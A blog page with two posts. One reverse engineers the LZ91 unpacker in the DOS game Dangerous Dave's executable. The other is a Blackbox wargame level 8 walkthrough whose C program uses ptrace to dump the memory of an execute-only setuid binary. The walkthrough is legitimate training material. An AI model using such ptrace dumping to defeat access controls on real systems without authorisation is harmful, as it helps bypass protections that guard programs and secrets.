Dany's 'blog: 2012

Friday, December 7, 2012

Reverse engineering Dangerous Dave: Packaging

I've been looking to take on a reverse-engineering project, as a means to practice the skill, for quite some time now.

I needed something simple, but not trivial. Old DOS games seemed like a nice option, since they are mostly small and not very complex, yet the challenge will still be real.
Dangerous Dave is one of the most ubiquitous games out there. It has been around since the late '80s, so it should be small enough for me to undertake as a first project.

Opening the file using the freeware version of IDA Pro, I was informed that the file is possibly packed. This means I should expect a big lump of data and some bootstrapping code that unpacks that data into executable code.

For the sake of exercise, I want to try tackling the disassembly of the unpacker using freely available tools.

Starting with the EXE header (for additional reference on EXE, a.k.a MZ, file structure you can check out http://www.tavi.co.uk/sdos/exeformat.html).
Let's look at a hex dump of the header:

$ xxd DAVE.EXE |head
0000000: 4d5a 2a01 9600 0000 0200 e31c ffff 3e2a  MZ*...........>*
0000010: 8000 0000 0e00 9812 1c00 0000 4c5a 3931  ............LZ91
0000020: ffff ba4d 252e 8916 3502 b430 cd21 8b2e  ...M%...5..0.!..
0000030: 02ff ff00 8b1e 2c00 8eda a390 008c 068e  ......,.........
0000040: 0089 1ef0 1f8a fc2e a600 e83d 01c4 3e88  ...........=..>.
0000050: feff e4c7 8bd8 b9ff 7ffc f2ae e361 4326  .............aC&
0000060: 38ff e105 75f6 80cd 80f7 d989 0ee5 b901  8...u...........
0000070: ff10 00d3 e383 c308 83e3 f8cb 8cfe 7fc3  ................
0000080: da2b ea8b 3ebe 4b81 ff00 0273 07bf 48ff  .+..>.K....s..H.
0000090: fb89 f3c7 129f 7228 033e ff1f b24b 7222  ......r(.>...Kr"

The fields of interest are:

Header paragraphs = 2
This is where the actual "program" starts in the file, i.e. this is the start of the image that will be loaded into memory by the DOS loader.
Initial CS = 0x1298
This is the segment address where that code will start executing
Initial IP = 0xE
This is the offset within the above segment where the loader will jump once the file has been loaded into memory.

Using these 3 parameters we can calculate the program's entry point as an offset from the start of the EXE file.
One thing to notice, though, is that the initial IP is not 0, meaning there might be some data at the start of the code segment.
Anyway, to find the offset of the code segment within the file, we need to skip the header, which occupies 2 paragraphs, and an additional CS (=0x1298) paragraphs. Each paragraph is 16 bytes long, resulting in a total offset of 2 * 16 + 0x1298 * 16 = 0x129A0 bytes.
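The same arithmetic can be checked mechanically. Below is a minimal Python 3 sketch (not part of the original toolchain) that unpacks the first 24 bytes of the header, copied from the hex dump above, using the standard MZ field layout. The variable names are my own.

```python
import struct

# First 32 bytes of DAVE.EXE, copied from the xxd output above.
header = bytes.fromhex(
    "4d5a2a01960000000200e31cffff3e2a"
    "800000000e0098121c0000004c5a3931"
)

# Standard MZ header layout: a 2-byte signature followed by 16-bit
# little-endian fields.
(signature, last_page_bytes, pages, relocations, header_paragraphs,
 min_alloc, max_alloc, initial_ss, initial_sp, checksum,
 initial_ip, initial_cs) = struct.unpack_from("<2s11H", header)

PARAGRAPH = 16  # bytes per paragraph

# Skip the header, then CS paragraphs, to reach the code segment.
code_segment_offset = (header_paragraphs + initial_cs) * PARAGRAPH
# Execution starts IP bytes into that segment.
entry_point_offset = code_segment_offset + initial_ip

print(hex(code_segment_offset), hex(entry_point_offset))
```

Running it should print 0x129a0 and 0x129ae, matching the hand calculation.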
To disassemble the code I will use ndisasm, the disassembler that ships with nasm (http://www.nasm.us/). I want to start disassembling at offset 0x129A0 from the start of the file, and treat the first 0xE (=14) bytes as (allegedly) data. The former is facilitated by the -e switch, which skips that many bytes of the file, and the latter by specifying a sync point using the -s switch, which makes sure an instruction starts exactly at offset 0xE (you can read all about the different switches here) like this:

$ ndisasm -b 16 -e129A0h -sEh DAVE.EXE
00000000  0000              add [bx+si],al
00000002  0000              add [bx+si],al
00000004  80003F            add byte [bx+si],0x3f
...

I will now go over each section I managed to identify in the executable and discuss it in detail.

Packed code

All the data from the 3rd paragraph of the file (the first 2 are the header) up to the start of the code segment, 0x1298 paragraphs in total. This is just one big chunk of data whose composition we do not yet know.

Unpacker data

Remember that there is a non-zero initial IP specified in the header? Well, that's because the first 14 bytes in the code segment are data:

$ xxd DAVE.EXE |grep "129a0"
00129a0: 0000 0000 8000 3f2f 9812 8d17 8a01 060e  ......?/........

The only interesting observation which can be made here is that 9812 looks a lot like a little-endian encoding of 0x1298, which is exactly the size of the packed code in paragraphs, so we can name it: word_0x8 = 0x1298 = packed code paragraphs.

Bootstrapping

This section is quite complex and contains several parts, which I will try to divide logically.

$ ndisasm -b 16 -e129A0h -sEh DAVE.EXE
...
0000000E  06                push es

This line is a bit curious: it pushes es onto the stack. During the loading process, es is loaded with the address of the PSP segment. While the segment contains very interesting system information, the "real" importance of it in this context is that it is the segment of the program's base, because the executable is loaded immediately following the PSP segment. This will be important later, so for now we need to remember that the address of the PSP segment is saved to the stack.

0000000F  0E                push cs
00000010  1F                pop ds
00000011  8B0E0C00          mov cx,[0xc]  ; word_0xc = 0x18a
00000015  8BF1              mov si,cx
00000017  4E                dec si
00000018  89F7              mov di,si
0000001A  8CDB              mov bx,ds
0000001C  031E0A00          add bx,[0xa]  ; word_0xa = 0x178d
00000020  8EC3              mov es,bx
00000022  FD                std
00000023  F3A4              rep movsb

Basically a memcpy of a chunk of 0x18a bytes from the beginning of the current segment to an address located 0x178d paragraphs forward. This chunk is exactly all the code and data from the start of the segment to the end of the file (0x129A0 + 0x18a = 0x12B2A, the file size), which means that the bootstrapping code itself is copied forward in memory to make room for the unpacked data.
One thing to notice is the method with which the code is copied. The addresses loaded into the source (ds:si) and destination (es:di) point to the end of the copied buffers, and the direction flag (DF) is set (by the std instruction) so after each movsb the si and di registers will decrease.
This means that when the copy loop has finished, es:di will point to the end of the free memory (just below the copy of the bootstrapping code) and ds:si will point to the end of the compressed code.
By the way, two words in the data section can now be named:

word_0xc = bootstrap code size
word_0xa = unpacked code paragraphs
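As a sanity check on these names, here is a small Python 3 sketch that decodes the 14 data bytes shown earlier as seven little-endian words and compares word_0xc with the number of bytes between the code segment and the end of the file. The file size is derived from the "pages" (0x96) and "bytes in last page" (0x12a) fields of the MZ header in the first hex dump; the variable names are illustrative.

```python
import struct

# The 14 data bytes at the start of the code segment (file offset 0x129A0).
unpacker_data = bytes.fromhex("0000000080003f2f98128d178a01")

# Seven little-endian 16-bit words, at offsets 0x0, 0x2, ..., 0xc.
words = struct.unpack("<7H", unpacker_data)
word_0x8, word_0xa, word_0xc = words[4], words[5], words[6]

# MZ header: 0x96 pages of 512 bytes, of which the last holds 0x12a bytes.
file_size = (0x96 - 1) * 512 + 0x12A
code_segment_offset = 0x129A0

# Everything from the code segment to the end of the file.
bytes_after_code_start = file_size - code_segment_offset

print(hex(word_0x8), hex(word_0xa), hex(word_0xc), hex(bytes_after_code_start))
```

If the naming is right, the last two printed values agree (both 0x18a).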

00000025  53                push bx
00000026  B82B00            mov ax,0x2b
00000029  50                push ax
0000002A  CB                retf

This just pushes the new segment address of the copy of the bootstrap code (in bx), and then the offset 0x2b, making the retf serve as a far jump to bx:0x2b. Since there is no difference between the running code and its copy, we can just look at offset 0x2b in the current code to see where the program will continue execution.

0000002B  2E8B2E0800        mov bp,[cs:0x8]
00000030  8CDA              mov dx,ds
00000032  89E8              mov ax,bp
00000034  3D0010            cmp ax,0x1000
00000037  7603              jna 0x3c
00000039  B80010            mov ax,0x1000
0000003C  29C5              sub bp,ax
0000003E  29C2              sub dx,ax
00000040  29C3              sub bx,ax
00000042  8EDA              mov ds,dx
00000044  8EC3              mov es,bx
00000046  B103              mov cl,0x3
00000048  D3E0              shl ax,cl
0000004A  89C1              mov cx,ax
0000004C  D1E0              shl ax,1
0000004E  48                dec ax
0000004F  48                dec ax
00000050  8BF0              mov si,ax
00000052  8BF8              mov di,ax
00000054  F3A5              rep movsw
00000056  09ED              or bp,bp
00000058  75D8              jnz 0x32

Translated to C (almost, I will use segmented addressing notation), the code above will look like this:

paragraphs_left = compressed_code_paragraphs;
while (paragraphs_left > 0) {
    if (paragraphs_left < 0x1000) {
        paragraphs_to_copy = paragraphs_left;
    } else {
        paragraphs_to_copy = 0x1000;
    }
    paragraphs_left -= paragraphs_to_copy;
    source_segment -= paragraphs_to_copy;
    destination_segment -= paragraphs_to_copy;
    source_offset = destination_offset = paragraphs_to_copy * 16 - 2; /* last word of the chunk (16-bit arithmetic) */
    words_to_copy = paragraphs_to_copy * 8;
    while (words_to_copy > 0) {
        *destination_segment:destination_offset = *source_segment:source_offset;
        destination_offset -= 2;
        source_offset -= 2;
        words_to_copy--;
    }
}

All this does is copy the packed code to the area adjacent and below the copy of the bootstrapping code.
The reason for copying in "chunks" is that you can only address 64KiB within a segment, that's 0x1000 paragraphs. So every 64KiB, the segment addresses of both the source and destination need to be readjusted.
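To make the chunked, back-to-front copy concrete, here is a minimal Python 3 sketch that models memory as a flat bytearray. It is a simulation under my own assumptions, not a translation of the original: the function name, its parameters and the adjustable chunk size are all made up for illustration. Copying from the highest address down is what keeps the copy correct when the destination overlaps the source at a higher address.

```python
def copy_up_in_chunks(memory, source, destination, paragraphs,
                      chunk_paragraphs=0x1000):
    """Copy `paragraphs` 16-byte paragraphs from `source` to `destination`
    (both linear byte addresses), last chunk first, last word first."""
    src_end = source + paragraphs * 16
    dst_end = destination + paragraphs * 16
    left = paragraphs
    while left > 0:
        n = min(left, chunk_paragraphs)
        left -= n
        # Move both "segments" down by the size of this chunk.
        src_end -= n * 16
        dst_end -= n * 16
        # Within the chunk, copy 16-bit words from the top down,
        # like rep movsw with the direction flag set.
        for offset in range(n * 16 - 2, -1, -2):
            memory[dst_end + offset:dst_end + offset + 2] = \
                memory[src_end + offset:src_end + offset + 2]


# Example: move 2 paragraphs up by 1 paragraph (overlapping regions).
memory = bytearray(range(32)) + bytearray(16)
copy_up_in_chunks(memory, 0, 16, 2, chunk_paragraphs=1)
```

After the call, memory[16:48] holds the original 32 bytes, even though source and destination overlap.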
After all the code/data is in place, the unpacking can begin.
First, make sure the source pointer points to the copy of the packed code, and the destination pointer points to the program's first segment (the beginning of the original packed code):

0000005B  8EC2              mov es,dx
0000005D  8EDB              mov ds,bx
0000005F  31F6              xor si,si
00000061  31FF              xor di,di

Now starts the unpacking routine. Because I don't want to paste a wall of code and then discuss its analysis, I will outline the unpacking algorithm, and then analyze small chunks of asm code to fill in the details.

Unpacker

The basic idea is that the packed code is composed of control data which comes in words, and regular data whose handling is specified by the control data.

00000063  BA1000            mov dx,0x10

So, dx is loaded with 16 (which is the number of bits in a word).

00000066  AD                lodsw
00000067  89C5              mov bp,ax

Then a word from the packed code is loaded into bp.

00000069  D1ED              shr bp,1
0000006B  4A                dec dx
0000006C  7505              jnz 0x73
0000006E  AD                lodsw
0000006F  89C5              mov bp,ax
00000071  B210              mov dl,0x10

This is a piece of code which will repeat a lot. What it does is shift the LSB of the control word into the CF, then update the remaining bits count (in dx) and if it has reached 0, the next control word is loaded into bp and the remaining bits count is reset.

00000073  7303              jnc 0x78
00000075  A4                movsb
00000076  EBF1              jmp short 0x69

This code actually handles the bit we pushed from the control word into the CF. If CF is set (control bit was 1) then copy a byte from the packed code to the unpacked code as-is and continue reading the next control bit. Otherwise (control bit was 0) continue with:

00000078  31C9              xor cx,cx

Reset cx.

0000007A  D1ED              shr bp,1
0000007C  4A                dec dx
0000007D  7505              jnz 0x84
0000007F  AD                lodsw
00000080  89C5              mov bp,ax
00000082  B210              mov dl,0x10

This should be familiar from before, just read the next bit and load a new word if needed.

00000084  7222              jc 0xa8

We will handle the case where the control bit is '1' later. If, however, the control bit was '0':

00000086  D1ED              shr bp,1
00000088  4A                dec dx
00000089  7505              jnz 0x90
0000008B  AD                lodsw
0000008C  89C5              mov bp,ax
0000008E  B210              mov dl,0x10

Load the next control bit into CF.

00000090  D1D1              rcl cx,1

And push it into cx (from right to left).

00000092  D1ED              shr bp,1
00000094  4A                dec dx
00000095  7505              jnz 0x9c
00000097  AD                lodsw
00000098  89C5              mov bp,ax
0000009A  B210              mov dl,0x10

Read another control bit

0000009C  D1D1              rcl cx,1

And shift it into cx too. So what we get in essence is the two control bits in reverse order in cx.

0000009E  41                inc cx
0000009F  41                inc cx

Add 2 to cx.

000000A0  AC                lodsb
000000A1  B7FF              mov bh,0xff
000000A3  8AD8              mov bl,al

Load the next byte from the packed code into bl, and put 0xff in bh. This will result in bx containing the signed (and negative) value of read_byte-256.

000000A5  E91300            jmp word 0xbb

Continue execution at:

000000BB  268A01            mov al,[es:bx+di]
000000BE  AA                stosb
000000BF  E2FA              loop 0xbb
000000C1  EBA6              jmp short 0x69

This is equivalent to:

while (cx-- > 0) {
    *destination_segment:destination_offset = *destination_segment:(destination_offset + bx);
    destination_offset++;
}

This code copies a chunk of cx bytes from already unpacked code (remember bx < 0) to the head of the unpacked code. This means that:

The byte that was loaded into bx represents an offset.
The two bits (+2) which were loaded into cx represent a length.

Let's recap before we continue.
The packed code is composed of control words, which are read bit by bit from LSB to MSB.
If we encounter a 1, we copy the next byte in the packed code to the unpacked code as-is.
If we encounter two 0's in a row, we need to copy N+2 bytes from the current position in the unpacked data minus D, where N is the next two bits in the control, and D is the next byte in the packed code.
How about if we read a 0 and then a 1? Well, that's the case I said we'll do later.

000000A8  AD                lodsw
000000A9  8BD8              mov bx,ax

Read a word from the packed data into ax (and bx).

000000AB  B103              mov cl,0x3
000000AD  D2EF              shr bh,cl
000000AF  80CFE0            or bh,0xe0
000000B2  80E407            and ah,0x7

This code separates two values encoded into the word. The 3 least significant bits of the high byte are kept in ah, while the remaining 5 most significant bits are shifted right in bh. The "or bh,0xe0" causes bx to contain the signed (and negative) value of its former value - 8192.
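The bit fiddling is easier to follow with concrete numbers. The following Python 3 sketch mirrors the four instructions above on a 16-bit word; the function name and return convention are my own, and the 16-bit register bx is emulated by subtracting 0x10000 to get its signed value.

```python
def split_match_word(word):
    """Split a 16-bit word into (length_field, distance), following
    shr bh,3 / or bh,0xe0 / and ah,7."""
    low, high = word & 0xFF, word >> 8
    length_field = high & 0x07               # and ah,0x7
    bx = (((high >> 3) | 0xE0) << 8) | low   # shr bh,cl ; or bh,0xe0
    distance = bx - 0x10000                  # bx read as a signed 16-bit value
    return length_field, distance


print(split_match_word(0x0A34))
```

For 0x0A34 the length field is 2 and the 13-bit offset is 0x134, so the distance comes out as 0x134 - 8192 = -7884.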

000000B5  740C              jz 0xc3

We will handle the case in which ah turned out to be 0 later. If ah was not 0:

000000B7  88E1              mov cl,ah
000000B9  41                inc cx
000000BA  41                inc cx

Just sets cx to ah+2.

000000BB  268A01            mov al,[es:bx+di]
000000BE  AA                stosb
000000BF  E2FA              loop 0xbb
000000C1  EBA6              jmp short 0x69

This is the same copy loop we analyzed before. This means that the 3 least-significant bits in the high byte are an encoded length (-2), and the rest of the word, when recombined, is the offset. Notice that while in the previous case the copied chunk's length was limited to 5 bytes and the offset to 256, here the length is limited to 9 bytes and the offset to 8192. How about that case in which the length we read is 0? Well:

000000C3  AC                lodsb

Read another byte from the packed code.

000000C4  08C0              or al,al
000000C6  7434              jz 0xfc
000000C8  3C01              cmp al,0x1
000000CA  7405              jz 0xd1

I'll cover the cases in which the read byte is 0 or 1 later.

000000CC  88C1              mov cl,al
000000CE  41                inc cx
000000CF  EBEA              jmp short 0xbb

If the read byte is bigger than 1, then load cx with that value + 1, and jump to the copying code. This means that the byte we read specified a length. Now let's handle the case in which that byte was 1:

000000D1  89FB              mov bx,di
000000D3  83E70F            and di,byte +0xf
000000D6  81C70020          add di,0x2000
000000DA  B104              mov cl,0x4
000000DC  D3EB              shr bx,cl
000000DE  8CC0              mov ax,es
000000E0  01D8              add ax,bx
000000E2  2D0002            sub ax,0x200
000000E5  8EC0              mov es,ax
000000E7  89F3              mov bx,si
000000E9  83E60F            and si,byte +0xf
000000EC  D3EB              shr bx,cl
000000EE  8CD8              mov ax,ds
000000F0  01D8              add ax,bx
000000F2  8ED8              mov ds,ax
000000F4  E972FF            jmp word 0x69

Remember that I mentioned earlier that we can't address more than 64KiB within a segment? Well, this limit could be reached while we are copying bytes to the uncompressed code. To avoid it, we need to readjust the segment addresses of both the source and the destination. This is exactly what the code does: for each of the addresses, it adds the number of paragraphs which fit inside the offset to the segment address, and leaves the remainder in the offset. For the destination it additionally keeps 0x2000 bytes in the offset (and subtracts the matching 0x200 paragraphs from the segment), so that copies which reach back up to 8192 bytes still work. For example, if ds:si = 0x1234:0x5678:

We can fit 0x567 paragraphs in 0x5678 bytes.
Add 0x567 to the segment address to obtain 0x179b.
The remainder, 0x8, is left in the offset.
The readjusted address, 0x179b:0x0008, is equivalent to 0x1234:0x5678 (you can check yourself by comparing the linear addresses), but the addressing limitation within the segment has been overcome.
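The equivalence of the two addresses can be verified with a few lines of Python 3. This is only a sketch with made-up helper names: normalize follows the source side (ds:si) of the listing, and normalize_destination follows the destination side (es:di), where the listing also adds 0x2000 to di and subtracts 0x200 from es.

```python
def linear(segment, offset):
    """Real-mode linear address of segment:offset."""
    return (segment << 4) + offset


def normalize(segment, offset):
    """Move whole paragraphs from the offset into the segment."""
    return (segment + (offset >> 4)) & 0xFFFF, offset & 0xF


def normalize_destination(segment, offset):
    """Same, but keep 0x2000 bytes (0x200 paragraphs) in the offset."""
    return (segment + (offset >> 4) - 0x200) & 0xFFFF, (offset & 0xF) + 0x2000


seg, off = normalize(0x1234, 0x5678)
print(hex(seg), hex(off), hex(linear(seg, off)))
```

Both helpers return an address with the same linear value as the input (0x179b8 for the example), which is the whole point of the readjustment.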

This just leaves the last case of the read byte being 0. Well, that's the "end-of-stream" marker, which means the unpacking process is done.

So to summarize the unpacking algorithm (I use C to denote the current offset in the output):

The packed code contains control words.
The control words are read bit-by-bit from LSB to MSB.
1 - read the next byte from the stream and copy it to the output as-is.
00 - read the next two bits from the control into N. read the next byte from the stream into D. Copy N+2 bytes from C+D-256 to the output.
01 - read the next word from the stream. Extract N from the 3 LSB of the high byte, and D from the word resulting by right-shifting the high byte by 3. Then:

If N > 0, copy N+2 bytes from C+D-8192 to the output.
If N = 0, read another byte from the stream into L. If L = 0, this is the end of stream, we are done. If L = 1, we need to readjust the segments.
If N = 0 and L > 1, copy L+1 bytes from C+D-8192 to the output.
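Putting the pieces together, here is a minimal Python 3 decoder written from the disassembly walked through above. It is a sketch, not a tested replacement for the real unpacker: it works on a flat buffer, so the segment readjustment marker becomes a no-op, and the function and variable names are my own. As in the listing, when the 3-bit length field is 0 an extra byte is read, which selects between end of stream (0), segment readjustment (1) and a longer copy. Note that, like the assembly, the next control word is fetched as soon as the 16th bit has been consumed, before the data belonging to that bit is read.

```python
def unpack(packed):
    """Decode a packed stream (bytes) into the unpacked bytes."""
    out = bytearray()
    pos = 0

    def read_byte():
        nonlocal pos
        value = packed[pos]
        pos += 1
        return value

    def read_word():
        low = read_byte()
        return low | (read_byte() << 8)

    control = read_word()
    bits_left = 16

    def read_bit():
        nonlocal control, bits_left
        bit = control & 1
        control >>= 1
        bits_left -= 1
        if bits_left == 0:          # reload eagerly, as the listing does
            control = read_word()
            bits_left = 16
        return bit

    while True:
        if read_bit():              # 1: literal byte
            out.append(read_byte())
            continue
        if not read_bit():          # 00: short match
            length = ((read_bit() << 1) | read_bit()) + 2
            distance = read_byte() - 256
        else:                       # 01: long match or special marker
            word = read_word()
            low, high = word & 0xFF, word >> 8
            distance = (low | ((high >> 3) << 8)) - 8192
            length = high & 7
            if length:
                length += 2
            else:
                extra = read_byte()
                if extra == 0:      # end of stream
                    break
                if extra == 1:      # segment readjustment: nothing to do here
                    continue
                length = extra + 1
        for _ in range(length):     # byte-wise copy, may overlap itself
            source = len(out) + distance
            if source < 0:
                raise ValueError("match reaches before start of output")
            out.append(out[source])
    return bytes(out)


# Hand-made stream: literals 'A', 'B', a 4-byte match at distance -2, end marker.
sample = bytes([0x93, 0x00, 0x41, 0x42, 0xFE, 0x00, 0x00, 0x00])
print(unpack(sample))
```

The hand-made sample decodes to b'ABABAB'. To try it on the game itself, one would feed it the 0x1298 paragraphs that start at file offset 0x20.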

This algorithm specification is actually enough to be able to unpack the code.
But in reality, the bootstrapping is not over yet. For one, the control needs to be passed to the unpacked code.
So for the sake of being thorough, let's continue just a bit more.

Relocation

When the end-of-stream has been reached, we jump to:

000000FC  0E                push cs
000000FD  1F                pop ds
000000FE  BE5801            mov si,0x158

Set ds to the current code segment, and load si with 0x158. This leads me to suspect that ds:si is now pointing to some data at the tail of the code:

$ xxd DAVE.EXE |grep -A20 "12af0:"
0012af0: 8ed6 8be7 fb2e ff2f 01dd 3200 3910 1530  ......./..2.9..0
0012b00: 2515 0015 3e12 00ed 1019 2000 0b14 00f0  %...>..... .....
0012b10: 0100 5e01 c85a 008d 0900 670a 5b87 4cdd  ..^..Z....g.[.L.
0012b20: 7400 8a01 0081 0200 0100                 t.........

Not that there will be any use for that data to us.

00000101  5B                pop bx
00000102  83C310            add bx,byte +0x10
00000105  89DA              mov dx,bx

OK, remember from way before, when I said that the PSP segment was pushed to the stack? Well, it's still there (so far all the stack operations were balanced). The size of the PSP is 256 bytes, or 0x10 (16) paragraphs, so bx holds the segment address immediately following the PSP, which is also the start of the code, this time the unpacked code.

00000107  31FF              xor di,di
00000109  AC                lodsb
0000010A  08C0              or al,al
0000010C  7416              jz 0x124
0000010E  B400              mov ah,0x0
00000110  01C7              add di,ax
00000112  8BC7              mov ax,di
00000114  83E70F            and di,byte +0xf
00000117  B104              mov cl,0x4
00000119  D3E8              shr ax,cl
0000011B  01C2              add dx,ax
0000011D  8EC2              mov es,dx
0000011F  26011D            add [es:di],bx
00000122  EBE5              jmp short 0x109
00000124  AD                lodsw
00000125  09C0              or ax,ax
00000127  7508              jnz 0x131
00000129  81C2FF0F          add dx,0xfff
0000012D  8EC2              mov es,dx
0000012F  EBD8              jmp short 0x109
00000131  3D0100            cmp ax,0x1
00000134  75DA              jnz 0x110

I'll spare you the deep analysis, but what happens here is this:

That data contains offsets to addresses which need to be relocated.
These offsets are cumulative (the offset to relocation address N is the sum of the first N entries in the table).
For each relocation address, the segment address of the code start is added to the word stored at that address.
The way these offsets are encoded is that each offset is a byte, unless that byte is 0, in which case it is followed by a word.
If that word is 0, it is not an offset and the current segment is simply advanced by 0xfff paragraphs. If it is 1, the iteration ends. Any other value is used as the offset.
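The table format can be exercised on the actual bytes from the hex dump above (the 50 bytes starting at cs:0x158, i.e. file offset 0x12af8). The Python 3 sketch below follows the assembly listing and returns the linear offsets, relative to the start of the unpacked code, of the words that get patched. The function name is made up, and a word value of 0 is treated as "advance by 0xfff paragraphs", as the listing does.

```python
def relocation_offsets(table):
    """Decode the cumulative relocation table into linear offsets."""
    offsets = []
    position = 0
    i = 0
    while True:
        delta = table[i]
        i += 1
        if delta == 0:
            # A zero byte is followed by a 16-bit little-endian word.
            delta = table[i] | (table[i + 1] << 8)
            i += 2
            if delta == 0:          # advance the segment by 0xfff paragraphs
                position += 0xFFF * 16
                continue
            if delta == 1:          # end of table
                break
        position += delta
        offsets.append(position)
    return offsets


table = bytes.fromhex(
    "01dd320039101530"
    "251500153e1200ed101920000b1400f0"
    "01005e01c85a008d0900670a5b874cdd"
    "74008a01008102000100"
)
offsets = relocation_offsets(table)
print(len(offsets), [hex(o) for o in offsets[:4]])
```

Decoding consumes the table exactly up to the last byte of the file, which is a good sign that the format has been understood correctly.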

This sums up the relocation process.

Wrapping up

The only thing left is jumping into the unpacked (and relocated) code to start the game:

00000136  8BC3              mov ax,bx

The segment address of the code start is loaded into ax.

00000138  8B3E0400          mov di,[0x4]        ; di = var_0x4
0000013C  8B360600          mov si,[0x6]
00000140  01C6              add si,ax           ; si = var_0x6 + reloc
00000142  01060200          add [0x2],ax        ; var_0x2 += reloc
00000146  2D1000            sub ax,0x10
00000149  8ED8              mov ds,ax           ; ds = PSP segment
0000014B  8EC0              mov es,ax           ; es = PSP segment
0000014D  31DB              xor bx,bx           ; bx = 0
0000014F  FA                cli
00000150  8ED6              mov ss,si           ; ss = var_0x6 + reloc
00000152  8BE7              mov sp,di           ; sp = var_0x4
00000154  FB                sti

This code just sets up the initial stack address (segment & offset), which also means that we can identify var_0x6 as the initial stack segment and var_0x4 as the initial stack offset. The code also loads var_0x2 with the segment address of the code start. The next (and last) instruction will reveal why:

00000155  2EFF2F            jmp word far [cs:bx]

This is a far jump, meaning that the address is loaded from two words at cs:0. The first (var_0x0) is the offset, and the second (var_0x2) is the segment, which means that the entry point of the unpacked code is simply its beginning.

That's it for the easy and fun part. Next time I will start reverse engineering the code we have just unpacked.

Saturday, January 28, 2012

Blackbox - chapter 8

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Let's see what level 8 holds in store:

$ ssh -p 2225 level8@blackbox.smashthestack.org
level8@blackbox.smashthestack.org's password:
...
level8@blackbox:~$ ls -l
total 16
-rw-r--r-- 1 root   root      10 2008-01-24 05:58 password
-rws--x--x 1 level9 level9 12254 2007-12-29 14:10 secrets

Wait a minute here, what's that? We only have execution permissions for secrets.
How can we analyze it if we can't even read it?
Well, there is a way, using ptrace sorcery. I won't go into too much depth here, so I recommend you read Playing with ptrace, Part I (I'd also recommend you read part II, just for general knowledge).
Anyway, to summarize these articles, the way debuggers work is by forking, invoking ptrace with PTRACE_TRACEME in the child, and then executing the to-be-traced process. The parent process can then control the child process and read its status using other ptrace calls.
So let's write a little program that does just that and reads the memory contents of the child process, where the child process will be secrets. This is how we can cheat the permission mechanism.

level8@blackbox:/tmp$ cat > wrap.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/wait.h>   /* wait() */
#include <unistd.h>

int main(int argc, char *argv[])
{
    int pid;
    char *prog[] = {"/home/level8/secrets", NULL};
    long addr;
    long size;
    int i = 0;
    int val;
    struct user_regs_struct regs;
    if (argc != 3) {
        printf("Usage: %s <address> <number of long words>\n", argv[0]);
        return 1;
    }
    addr = strtoul(argv[1], NULL, 16);
    size = strtoul(argv[2], NULL, 10);
    pid = fork();
    if (0 == pid) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execve(prog[0], prog, NULL);
    } else {
        wait(NULL);
        for (i = 0; i < size; ++i) {
            val = ptrace(PTRACE_PEEKTEXT, pid, addr + 4*i, NULL);
            printf("%02x", val & 0xFF);
            printf("%02x", (val >> 8) & 0xFF);
            printf("%02x", (val >> 16) & 0xFF);
            printf("%02x", (val >> 24) & 0xFF);
        }
        printf("\n");
        ptrace(PTRACE_KILL, pid, NULL, NULL);
    }
    return 0;
}

level8@blackbox:/tmp$ gcc -o wrap wrap.c

As you can see, the child just invokes ptrace with PTRACE_TRACEME and executes the level's program.
The parent waits for the child to stop, and then reads the specified amount of long words from the specified address, prints them out encoded as a hex string, and then kills the child.
Let's try out our new toy, but which address interests us? Well, the function main commonly starts at 0x08048464. As for the number of long words to read, let's read some large amount; I'm sure main isn't too long:

level8@blackbox:/tmp$ ./wrap 0x08048464 200
5589e55381ec3404000083e4f0b80000000029c4c745f464870408c7042475870408e8cdfeffff8945f0c
785e4fbffff000000008b45f0890424e8c5feffff483985e4fbffff734781bde4fbfffffb0300007602eb
398d85e8fbffff89c3039de4fbffff8b85e4fbffff0345f08d48018b85e4fbffff0345f00fb6100fb6012
8d0045a88038d85e4fbffffff00eba58d85e8fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600c0
f804240f042188028d85e9fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600240f042188028d85e
afbffff0385e4fbffffc60000c785e4fbffff000000008d85e8fbffff890424e80bfeffff483985e4fbff
ff7205e99b0000008d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4fbffff8d85e9fbffff0
385e4fbffff0fb600320288018d85e9fbffff89c1038de4fbffff8d85e9fbffff89c20395e4fbffff8d85
e8fbffff0385e4fbffff0fb600320288018d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4f
bffff8d85e9fbffff0385e4fbffff0fb600320288018d85e4fbffff830002e949ffffff8d95e8fbffff8b
45f489442404891424e81dfdffff85c0751ac7042492870408e85dfdffffc704249b870408e811fdffffe
b0cc70424a3870408e843fdffffb8000000008b5dfcc9c3905589e5575631f65383ec0ce8a000000081c3
44120000e8a5fcffff8d9314ffffff8d8314ffffff29c2c1fa0239d6731c89d78db426000000008dbc270
0000000ff94b314ffffff4639fe72f483c40c5b5e5f5dc38db6000000008dbf000000005589e583ec0889
1c24e84200000081c3e6110000897424048d8314ffffff8d9314ffffff29d0c1f80285c08d70ff7510e85
b0000008b1c248b74240489ec5dc3ff94b314ffffff89f04e85c075f2ebe08b1c24c39090909090909090
909090905589e55383ec04bb90980408a19098040883f8ff74168d76008dbc270000000083eb04ffd08b0
383f8ff75f4585b5dc35589e553e8000000005b81c35b11000052e89afcffff8b5dfcc9c3000300000001
000200555b5b5a526357666358564d246c222300506c6561736520656e74657220796f
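To work on this dump offline, the hex string has to be turned back into raw bytes. A minimal Python 3 sketch of that step follows; the function name is made up, and the short input is just the first few bytes of the dump above.

```python
def hex_dump_to_bytes(text):
    """Convert a (possibly line-wrapped) hex string into raw bytes."""
    # Drop newlines and spaces introduced by terminal wrapping or pasting.
    return bytes.fromhex("".join(text.split()))


# The first bytes of the dump: push ebp / mov ebp,esp / push ebx / sub esp,0x434
prologue = hex_dump_to_bytes("5589e553\n81ec34040000")
print(prologue.hex())
```

Writing the result to disk is then one more line, for example open("main.bin", "wb").write(hex_dump_to_bytes(dump)), where dump holds the full hex string.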

Now, to disassemble this I will use ndisasm (part of nasm), which is not installed on the blackbox server. First I'll decode the hex string into a binary file which I will call main.bin, and then I will disassemble it at the base address of main:

~$ ndisasm -u -o 0x08048464 main.bin |cat -n|grep ret
   124 0804864E  C3                ret
   154 080486A3  C3                ret
   176 080486EF  C3                ret
